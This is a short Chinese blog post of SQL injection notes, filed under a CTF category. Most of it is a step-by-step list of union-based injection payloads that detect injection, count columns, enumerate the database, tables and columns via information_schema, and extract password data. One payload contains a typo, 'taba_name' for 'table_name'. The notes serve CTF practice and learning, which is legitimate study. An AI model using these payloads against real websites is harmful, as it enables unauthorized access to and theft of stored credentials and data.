SQL注入笔记

喜气杨杨❀

已于 2022-07-20 11:59:27 修改

阅读量294

点赞数

分类专栏： CTF SQL注入文章标签： web

于 2022-07-19 20:55:08 首次发布

本文链接：https://blog.csdn.net/weixin_43896504/article/details/125880619

版权

15 篇文章 0 订阅

订阅专栏

3 篇文章 0 订阅

订阅专栏

本文详细介绍了SQL注入的基本步骤，包括判断注入、查询字段数、数据库信息、表名、列名及具体数据。同时列举了CTFshowweb入门系列的SQLweb171至173题目，提醒读者关注SQL注入的安全问题并学习防御措施。

摘要由CSDN通过智能技术生成

常规注入步骤

（1）判断是否存在注入：

and 1=2 --+

（2）判断字段数：

order by 2 --+

（3）查询数据库：

and 1=2 union select 1,database() --+

（4）查询表名：

and 1=2 union select 1,group_concat(taba_name) from information_schema.tables where table_schema='库名' --+

（5）查询列名：

and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='表名' --+

（6）查询具体数据：

and 1=2 union select 1,password from 表名 --+

~~分界线 ~~ ~~分界线 ~~ ~~分界线 ~~ ~~分界线 ~~

关注

专栏目录